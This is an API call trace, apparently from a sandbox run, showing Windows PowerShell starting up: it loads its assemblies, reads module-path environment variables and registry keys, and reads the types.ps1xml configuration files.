[0082.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0082.901] SetConsoleCtrlHandler (HandlerRoutine=0x294677c, Add=1) returned 1 [0082.918] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0082.918] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0082.918] CoTaskMemFree (pv=0x1f7740) [0082.934] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x320 [0082.937] CoCreateGuid (in: pguid=0xedb90 | out: pguid=0xedb90*(Data1=0xe52a6bab, Data2=0x8e92, Data3=0x40be, Data4=([0]=0x82, [1]=0x6c, [2]=0x7e, [3]=0x9e, [4]=0x1a, [5]=0x57, [6]=0xe1, [7]=0x42))) returned 0x0 [0082.940] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0082.941] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0082.941] CoTaskMemFree (pv=0x1f7740) [0082.979] WinSqmIsOptedIn () returned 0x0 [0082.979] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0082.979] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0082.979] CoTaskMemFree (pv=0x1f7740) [0082.984] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0082.984] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0082.984] CoTaskMemFree (pv=0x1f7740) [0082.985] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0082.985] CoTaskMemFree (pv=0x1f7740) [0082.987] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0082.987] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0082.987] CoTaskMemFree (pv=0x1f7740) [0082.988] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0082.988] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0082.988] CoTaskMemFree (pv=0x1f7740) [0083.001] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0083.002] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0083.002] CoTaskMemFree (pv=0x1f7740) [0083.003] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0083.003] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0083.003] CoTaskMemFree (pv=0x1f7740) [0083.005] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0083.005] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0083.005] CoTaskMemFree (pv=0x1f7740) [0083.008] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0083.008] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0083.008] CoTaskMemFree (pv=0x1f7740) [0083.017] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0083.017] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0083.021] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0083.021] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0083.021] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0083.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0083.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0083.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0083.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0083.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0083.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0083.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0083.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0083.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0083.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0083.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0083.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0083.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0083.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0083.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0083.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0083.857] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0083.857] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33 [0083.857] CoTaskMemFree (pv=0x1f7740) [0083.896] CoTaskMemAlloc (cb=0xcc) returned 0x24d640 [0083.896] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x24d640, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0083.896] CoTaskMemFree (pv=0x24d640) [0083.896] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xed708 | out: phkResult=0xed708*=0x328) returned 0x0 [0083.896] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xed68c, lpData=0x0, lpcbData=0xed688*=0x0 | out: lpType=0xed68c*=0x2, lpData=0x0, lpcbData=0xed688*=0x6c) returned 0x0 [0083.902] CoTaskMemAlloc (cb=0x70) returned 0x1c9290 [0083.902] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xed65c, lpData=0x1c9290, lpcbData=0xed658*=0x6c | out: lpType=0xed65c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0xed658*=0x6c) returned 0x0 [0083.902] CoTaskMemFree (pv=0x1c9290) [0083.902] CoTaskMemAlloc (cb=0xcc) returned 0x24d640 [0083.902] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x24d640, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb [0083.903] CoTaskMemFree (pv=0x24d640) [0083.903] CoTaskMemAlloc (cb=0xcc) returned 0x24d640 [0083.903] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x24d640, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0083.903] CoTaskMemFree (pv=0x24d640) [0083.905] RegCloseKey (hKey=0x328) returned 0x0 [0083.906] CoTaskMemAlloc (cb=0xcc) returned 0x24d640 [0083.906] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x24d640, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0083.906] CoTaskMemFree (pv=0x24d640) [0083.906] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xed708 | out: phkResult=0xed708*=0x328) returned 0x0 [0083.906] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xed68c, lpData=0x0, lpcbData=0xed688*=0x0 | out: lpType=0xed68c*=0x0, lpData=0x0, lpcbData=0xed688*=0x0) returned 0x2 [0083.906] RegCloseKey (hKey=0x328) returned 0x0 [0083.974] CoTaskMemAlloc (cb=0x20c) returned 0x1ec720 [0083.974] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1ec720 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0 [0083.975] CoTaskMemFree (pv=0x1ec720) [0083.975] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0xed290, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b [0083.976] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1 [0083.986] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0083.986] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0083.986] CoTaskMemFree (pv=0x1f7740) [0083.988] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0083.988] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0083.988] CoTaskMemFree (pv=0x1f7740) [0084.002] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0084.002] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0084.002] CoTaskMemFree (pv=0x1f7740) [0084.003] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0084.003] CoTaskMemFree (pv=0x1f7740) [0084.014] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed4f8 | out: phkResult=0xed4f8*=0x330) returned 0x0 [0084.033] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0xed50c, lpData=0x0, lpcbData=0xed508*=0x0 | out: lpType=0xed50c*=0x1, lpData=0x0, lpcbData=0xed508*=0x74) returned 0x0 [0084.034] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0xed47c, lpData=0x0, lpcbData=0xed478*=0x0 | out: lpType=0xed47c*=0x1, lpData=0x0, lpcbData=0xed478*=0x74) returned 0x0 [0084.034] CoTaskMemAlloc (cb=0x78) returned 0x1c9290 [0084.034] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0xed44c, lpData=0x1c9290, lpcbData=0xed448*=0x74 | out: lpType=0xed44c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xed448*=0x74) returned 0x0 [0084.034] CoTaskMemFree (pv=0x1c9290) [0084.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xed1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0084.035] SetErrorMode (uMode=0x1) returned 0x1 [0084.035] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xed3d0 | out: lpFileInformation=0xed3d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0084.035] SetErrorMode (uMode=0x1) returned 0x1 [0084.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xed1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0084.037] SetErrorMode (uMode=0x1) returned 0x1 [0084.037] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed3d0 | out: lpFileInformation=0xed3d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0084.038] SetErrorMode (uMode=0x1) returned 0x1 [0084.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xed1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0084.042] SetErrorMode (uMode=0x1) returned 0x1 [0084.043] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed3d0 | out: lpFileInformation=0xed3d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0084.044] SetErrorMode (uMode=0x1) returned 0x1 [0084.049] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0084.049] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0084.059] CoTaskMemAlloc (cb=0x104) returned 0x1f7740 [0084.059] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7740, nSize=0x80 | out: lpBuffer="") returned 0x0 [0084.059] GetACP () returned 0x4e4 [0084.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xecd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0084.088] SetErrorMode (uMode=0x1) returned 0x1 [0084.089] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334 [0084.090] GetFileType (hFile=0x334) returned 0x1 [0084.090] SetErrorMode (uMode=0x1) returned 0x1 [0084.090] GetFileType (hFile=0x334) returned 0x1 [0084.091] ReadFile (in: hFile=0x334, lpBuffer=0x2bff0a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2bff0a8*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.104] ReadFile (in: hFile=0x334, lpBuffer=0x2bff0a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2bff0a8*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.105] ReadFile (in: hFile=0x334, lpBuffer=0x2bff0a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2bff0a8*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.105] ReadFile (in: hFile=0x334, lpBuffer=0x2bff0a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2bff0a8*, lpNumberOfBytesRead=0xed308*=0xcf3, lpOverlapped=0x0) returned 1 [0084.105] ReadFile (in: hFile=0x334, lpBuffer=0x2bfe503, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2bfe503*, lpNumberOfBytesRead=0xed308*=0x0, lpOverlapped=0x0) returned 1 [0084.105] ReadFile (in: hFile=0x334, lpBuffer=0x2bff0a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2bff0a8*, lpNumberOfBytesRead=0xed308*=0x0, lpOverlapped=0x0) returned 1 [0084.108] CloseHandle (hObject=0x334) returned 1 [0084.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xed020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0084.113] SetErrorMode (uMode=0x1) returned 0x1 [0084.113] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed280 | out: lpFileInformation=0xed280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0084.113] SetErrorMode (uMode=0x1) returned 0x1 [0084.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xecfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0084.117] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed368 | out: phkResult=0xed368*=0x334) returned 0x0 [0084.117] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed2ec, lpData=0x0, lpcbData=0xed2e8*=0x0 | out: lpType=0xed2ec*=0x1, lpData=0x0, lpcbData=0xed2e8*=0x56) returned 0x0 [0084.117] CoTaskMemAlloc (cb=0x5a) returned 0x1b2825e0 [0084.117] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed2bc, lpData=0x1b2825e0, lpcbData=0xed2b8*=0x56 | out: lpType=0xed2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed2b8*=0x56) returned 0x0 [0084.118] RegCloseKey (hKey=0x334) returned 0x0 [0084.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xecfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0084.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xece60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0084.229] VirtualQuery (in: lpAddress=0xec050, lpBuffer=0xecf10, dwLength=0x30 | out: lpBuffer=0xecf10*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0084.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xecd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0084.248] SetErrorMode (uMode=0x1) returned 0x1 [0084.249] SetErrorMode (uMode=0x1) returned 0x1 [0084.249] GetFileType (hFile=0x334) returned 0x1 [0084.249] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.251] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.251] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 [0084.252] ReadFile (in: hFile=0x334, lpBuffer=0x2c66268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed308, lpOverlapped=0x0 | out: lpBuffer=0x2c66268*, lpNumberOfBytesRead=0xed308*=0x1000, lpOverlapped=0x0) returned 1 